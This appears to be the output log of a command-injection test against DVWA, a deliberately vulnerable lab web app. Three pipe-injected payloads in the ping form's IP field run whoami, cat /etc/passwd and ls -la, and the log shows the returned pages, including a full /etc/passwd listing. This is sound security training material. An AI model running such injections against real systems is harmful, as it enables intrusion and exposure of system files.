[!] Payload used: ls | whoami
[+] Response after command injection:
================================================================================


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">



<html xmlns="http://www.w3.org/1999/xhtml">



	<head>

		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



		<title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title>



		<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />



		<link rel="icon" type="\image/ico" href="../../favicon.ico" />



		<script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script>



	</head>



	<body class="home">

		<div id="container">



			<div id="header">



				<img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" />



			</div>



			<div id="main_menu">



				<div id="main_menu_padded">

				<ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class="selected"><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class=""><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul>

				</div>



			</div>



			<div id="main_body">



				

<div class="body_padded">

	<h1>Vulnerability: Command Execution</h1>



	<div class="vulnerable_code_area">



		<h2>Ping for FREE</h2>



		<p>Enter an IP address below:</p>

		<form name="ping" action="#" method="post">

			<input type="text" name="ip" size="30">

			<input type="submit" value="submit" name="submit">

		</form>



		<pre>www-data
</pre>



	</div>



	<h2>More info</h2>

	<ul>

		<li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution" target="_blank">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/bash/" target="_blank">http://www.ss64.com/bash/</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/nt/" target="_blank">http://www.ss64.com/nt/</a></li>

	</ul>

</div>



				<br />

				<br />

				



			</div>



			<div class="clear">

			</div>



			<div id="system_info">

				<input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=exec&security=medium' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=exec&security=medium' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div>

			</div>



			<div id="footer">



				<p>Damn Vulnerable Web Application (DVWA) v1.0.7</p>



			</div>



		</div>



	</body>



</html>================================================================================

[!] Payload used: 127.0.0.1 | cat /etc/passwd
[+] Response after command injection:
================================================================================


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">



<html xmlns="http://www.w3.org/1999/xhtml">



	<head>

		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



		<title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title>



		<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />



		<link rel="icon" type="\image/ico" href="../../favicon.ico" />



		<script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script>



	</head>



	<body class="home">

		<div id="container">



			<div id="header">



				<img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" />



			</div>



			<div id="main_menu">



				<div id="main_menu_padded">

				<ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class="selected"><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class=""><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul>

				</div>



			</div>



			<div id="main_body">



				

<div class="body_padded">

	<h1>Vulnerability: Command Execution</h1>



	<div class="vulnerable_code_area">



		<h2>Ping for FREE</h2>



		<p>Enter an IP address below:</p>

		<form name="ping" action="#" method="post">

			<input type="text" name="ip" size="30">

			<input type="submit" value="submit" name="submit">

		</form>



		<pre>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
</pre>



	</div>



	<h2>More info</h2>

	<ul>

		<li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution" target="_blank">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/bash/" target="_blank">http://www.ss64.com/bash/</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/nt/" target="_blank">http://www.ss64.com/nt/</a></li>

	</ul>

</div>



				<br />

				<br />

				



			</div>



			<div class="clear">

			</div>



			<div id="system_info">

				<input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=exec&security=medium' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=exec&security=medium' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div>

			</div>



			<div id="footer">



				<p>Damn Vulnerable Web Application (DVWA) v1.0.7</p>



			</div>



		</div>



	</body>



</html>================================================================================

[!] Payload used: 127.0.0.1 | ls -la
[+] Response after command injection:
================================================================================


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">



<html xmlns="http://www.w3.org/1999/xhtml">



	<head>

		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />



		<title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title>



		<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />



		<link rel="icon" type="\image/ico" href="../../favicon.ico" />



		<script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script>



	</head>



	<body class="home">

		<div id="container">



			<div id="header">



				<img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" />



			</div>



			<div id="main_menu">



				<div id="main_menu_padded">

				<ul><li onclick="window.location='../../.'" class=""><a href="../../.">Home</a></li><li onclick="window.location='../../instructions.php'" class=""><a href="../../instructions.php">Instructions</a></li><li onclick="window.location='../../setup.php'" class=""><a href="../../setup.php">Setup</a></li></ul><ul><li onclick="window.location='../../vulnerabilities/brute/.'" class=""><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li onclick="window.location='../../vulnerabilities/exec/.'" class="selected"><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li onclick="window.location='../../vulnerabilities/csrf/.'" class=""><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li onclick="window.location='../../vulnerabilities/fi/.?page=include.php'" class=""><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li onclick="window.location='../../vulnerabilities/sqli/.'" class=""><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li onclick="window.location='../../vulnerabilities/sqli_blind/.'" class=""><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li onclick="window.location='../../vulnerabilities/upload/.'" class=""><a href="../../vulnerabilities/upload/.">Upload</a></li><li onclick="window.location='../../vulnerabilities/xss_r/.'" class=""><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li onclick="window.location='../../vulnerabilities/xss_s/.'" class=""><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li onclick="window.location='../../security.php'" class=""><a href="../../security.php">DVWA Security</a></li><li onclick="window.location='../../phpinfo.php'" class=""><a href="../../phpinfo.php">PHP Info</a></li><li onclick="window.location='../../about.php'" class=""><a href="../../about.php">About</a></li></ul><ul><li onclick="window.location='../../logout.php'" class=""><a href="../../logout.php">Logout</a></li></ul>

				</div>



			</div>



			<div id="main_body">



				

<div class="body_padded">

	<h1>Vulnerability: Command Execution</h1>



	<div class="vulnerable_code_area">



		<h2>Ping for FREE</h2>



		<p>Enter an IP address below:</p>

		<form name="ping" action="#" method="post">

			<input type="text" name="ip" size="30">

			<input type="submit" value="submit" name="submit">

		</form>



		<pre>total 20
drwxr-xr-x  4 www-data www-data 4096 May 20  2012 .
drwxr-xr-x 11 www-data www-data 4096 May 20  2012 ..
drwxr-xr-x  2 www-data www-data 4096 May 20  2012 help
-rw-r--r--  1 www-data www-data 1509 Mar 16  2010 index.php
drwxr-xr-x  2 www-data www-data 4096 May 20  2012 source
</pre>



	</div>



	<h2>More info</h2>

	<ul>

		<li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution" target="_blank">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/bash/" target="_blank">http://www.ss64.com/bash/</a></li>

		<li><a href="http://hiderefer.com/?http://www.ss64.com/nt/" target="_blank">http://www.ss64.com/nt/</a></li>

	</ul>

</div>



				<br />

				<br />

				



			</div>



			<div class="clear">

			</div>



			<div id="system_info">

				<input type="button" value="View Help" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_help.php?id=exec&security=medium' )"> <input type="button" value="View Source" class="popup_button" onClick="javascript:popUp( '../../vulnerabilities/view_source.php?id=exec&security=medium' )"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div>

			</div>



			<div id="footer">



				<p>Damn Vulnerable Web Application (DVWA) v1.0.7</p>



			</div>



		</div>



	</body>



</html>================================================================================

